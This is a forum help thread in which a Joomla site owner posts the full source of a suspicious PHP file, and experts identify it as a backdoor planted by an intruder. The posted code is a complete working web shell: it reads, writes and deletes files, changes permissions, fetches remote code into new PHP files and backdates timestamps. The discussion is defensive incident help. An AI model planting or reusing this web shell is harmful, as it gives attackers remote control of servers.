Solved

strange file suddenly appeared

Posted on 2013-12-14
10
554 Views
Last Modified: 2013-12-14
Hi,

I have a Windows 2008 server running PHP among other things. I have a Joomla site that I noticed today has a strange file added at my site root 4 days ago that I'm not sure what it is.

Obviously I'm alarmed, but I took a look at the file and I'm enough of a newb with PHP, I'm not entirely sure what it's all supposed to be doing or what it's origins might be. Can anyone have a gander and summarize what this is? It's a file called wp-sto.php but wordpress is not present on this site.

<?
ignore_user_abort(1);

$err_flg=$_GET['err'];
if ($err_flg==1) {error_reporting(-1);}
else {error_reporting(0);}

set_time_limit(300);

  if (isset($_GET['sc']) && ($_GET['sc'] == 1)) die(file_get_contents(__FILE__));
  if (isset($_GET['scmd5']) && ($_GET['scmd5'] == 1)) die(md5(file_get_contents(__FILE__)));
  if (isset($_GET['read']) && isset($_GET['write'])) {file_put_contents($_GET["write"],file_get_contents($_GET['read'])); die();}
  if (isset($_GET['read']) && !isset($_GET['write'])) die(file_get_contents($_GET['read']));
  if (isset($_GET['del'])) { unlink($_GET['del']); die();}

$else_dot=$_GET['else_dot'];
$flag_sum=$_GET['flag_sum'];
$chmod_name=$_GET['chmod_name'];
$chmod_mod=$_GET['chmod_mod'];
$chmod_mod=intval($chmod_mod, 8);
$f_creat_url=$_GET['f_creat_url'];
$f_creat_name=$_GET['f_creat_name'];
$f_del_name=$_GET['f_del_name'];
$folder_creat_name=$_GET['folder_creat_name'];
$folder_del_name=$_GET['folder_del_name'];
$tfilet=$_GET['tfilet'];

if ($flag_sum==1) {echo "734057843957";}

if ($tfilet)
	{
	atouch($tfilet);	
	}

if ($chmod_name)
   {
   if ($else_dot==1) {chmod ($chmod_name, $chmod_mod);}
   else
       {
       if ($else_dot) {chmod ("$chmod_name.$else_dot", $chmod_mod);}
       else {chmod ("$chmod_name.php", $chmod_mod);}
       }
   echo "ok chmod";
   }


if ($f_creat_url)
   {
   $new_vsn1="http://$f_creat_url";
   $new_vsn=getau("$new_vsn1");
   if ($else_dot==1) {$new_v_f=fopen("$f_creat_name","w+");}
   else
       {
       if ($else_dot) {$new_v_f=fopen("$f_creat_name.$else_dot","w+");}
       else {$new_v_f=fopen("$f_creat_name.php","w+");}
       }
   fwrite($new_v_f, "$new_vsn");
   fclose($new_v_f);
   echo "ok creat file";
   }

if ($f_del_name)
   {
   if ($else_dot==1) {unlink ("$f_del_name");}
   else
       {
       if ($else_dot) {unlink ("$f_del_name.$else_dot");}
       else {unlink ("$f_del_name.php");}
       }
   echo "ok del file";
   }

if ($folder_creat_name)
   {
   $flag_mkd = mkdir ($folder_creat_name, 0777);
   echo "ok make dir";
   }

if ($folder_del_name)
   {
   $folder_del_name=trim($folder_del_name);
   if ($folder_del_name<>"")
   {
   removeDirRec("$folder_del_name");
   echo "ok del dir";
   }
   }

function getau ($path)
{
 if (!function_exists ("file_get_contents"))
 {
  function file_get_contents ($addr)
  {
   $a = @fopen ($addr, "r");
   $tmp = @fread ($a, sprintf ("%u", @filesize ($a)));
   @fclose ($a);
   if ($a) return @$tmp;
  }
 }

 if (!function_exists ("file_put_contents"))
 {
  function file_put_contents ($addr, $con)
  {
   $a = @fopen ($addr, "w+");
   if (!$a) return 0;
   @fwrite ($a, $con);
   @fclose ($a);
   return @strlen ($con);
  }
 }
 $content = file_get_contents ($path);
 if ($content=="")
 {
  $curl = curl_init ();
  curl_setopt ($curl, CURLOPT_URL, trim($path));
  curl_setopt ($curl, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt ($curl, CURLOPT_CONNECTTIMEOUT, 5);
  curl_setopt ($curl, CURLOPT_TIMEOUT, 5);
  $content = curl_exec ($curl);
  curl_close($curl);
 }
 if ($content!="")
 {
  return $content;
 }
}

function atouch($dist)
		{
		$dist = "$dist.php";
		$filetimefilec = "index.php";
		$ATime  = date('Y-m-d H:i:s',fileatime($filetimefilec));
		$MTime = date('Y-m-d H:i:s',filemtime($filetimefilec));
		if ( (!$cftime2=strchr($MTime,"200")) and (!$cftime3=strchr($MTime,"201")) )
			{
			$filetimefilec = "index.html";
			$ATime  = date('Y-m-d H:i:s',fileatime($filetimefilec));
			$MTime = date('Y-m-d H:i:s',filemtime($filetimefilec));
			}
		if ( ($cftime2=strchr($ATime,"200")) or ($cftime3=strchr($ATime,"201")) )
			{
			$MTime = filemtime("$filetimefilec");
			@touch($dist,$MTime,$MTime);
			}
		}
function removeDirRec($dir)
{
    if ($objs = glob($dir."/*")) {
        foreach($objs as $obj) {
            is_dir($obj) ? removeDirRec($obj) : unlink($obj);
        }
    }
    rmdir($dir);
}



?>

Open in new window


Any ideas?

Thanks
0
Comment
Question by:billium99
  • 3
  • 3
  • 2
  • +2
10 Comments
 
LVL 31

Expert Comment

by:Marco Gasi
ID: 39718988
I only toke a look, but if I were you I would immediately backup those file in my localhost for deeper analysis and then I would delete them from the server. Immediately.

Then I would talk with the hosting service provider. The code you posted above changes permissions, deletes files and these are thing only should do: if you're not sure about, don't trust it.

I don't know joomla, but I doubt any framwork can create such files: I repeat, copy them in an unoffensive location and delete them from the server, then talk with host provider.
0
 
LVL 1

Author Comment

by:billium99
ID: 39718997
Hmm - this is my dedicated server. File already moved offline.

Changes permissions in what way? Deletes which files?
0
 
LVL 83

Expert Comment

by:Dave Baldwin
ID: 39718999
Yes, get rid of that file.
0
PRTG Network Monitor: Intuitive Network Monitoring

Network Monitoring is essential to ensure that computer systems and network devices are running. Use PRTG to monitor LANs, servers, websites, applications and devices, bandwidth, virtual environments, remote systems, IoT, and many more. PRTG is easy to set up & use.

 
LVL 31

Expert Comment

by:Marco Gasi
ID: 39719007
'Changes permissions in what way?': look at line 37. chmod changes permissions of files and directories.

'Deletes which files?': look at line 67. Unlink is the php command to delete files.
0
 
LVL 83

Assisted Solution

by:Dave Baldwin
Dave Baldwin earned 125 total points
ID: 39719053
And all that is done from data sent in the URL to that page.  That's where all the $_GET variables come from.  It is a way of remotely changing your web site without your permission.  Even deleting the whole thing.
0
 
LVL 83

Expert Comment

by:Dave Baldwin
ID: 39719059
And yes, someone broke into your server.  You should change passwords for all access.
0
 
LVL 31

Assisted Solution

by:Marco Gasi
Marco Gasi earned 125 total points
ID: 39719060
Yes, indeed. I was reading the code: really, I don't understand what exactly does in which sequence, but it seems to be a trojan horse: from a remote web server one bad guy intends to call that file passing it some parameter and do something bad like delete your files, even empty whole directories...

Change all password and provide security to your dedicated server, because it has been violated. I'm sorry.
0
 
LVL 34

Assisted Solution

by:gr8gonzo
gr8gonzo earned 125 total points
ID: 39719067
Make sure Joomla is also updated to its latest release for your major version. It's possible that a hacker doesn't know any passwords or hasn't actually hacked into your server yet but simply used a Joomla exploit to place a file to gain further access.
0
 
LVL 109

Accepted Solution

by:
Ray Paseur earned 125 total points
ID: 39719072
And look out for security exploits, especially in the plug-ins.
http://developer.joomla.org/security.html
0
 
LVL 1

Author Closing Comment

by:billium99
ID: 39719182
Thanks
0

Featured Post

What is SQL Server and how does it work?

The purpose of this paper is to provide you background on SQL Server. It’s your self-study guide for learning fundamentals. It includes both the history of SQL and its technical basics. Concepts and definitions will form the solid foundation of your future DBA expertise.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Developers of all skill levels should learn to use current best practices when developing websites. However many developers, new and old, fall into the trap of using deprecated features because this is what so many tutorials and books tell them to u…
Since pre-biblical times, humans have sought ways to keep secrets, and share the secrets selectively.  This article explores the ways PHP can be used to hide and encrypt information.
Explain concepts important to validation of email addresses with regular expressions. Applies to most languages/tools that uses regular expressions. Consider email address RFCs: Look at HTML5 form input element (with type=email) regex pattern: T…
The viewer will learn how to create and use a small PHP class to apply a watermark to an image. This video shows the viewer the setup for the PHP watermark as well as important coding language. Continue to Part 2 to learn the core code used in creat…

770 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question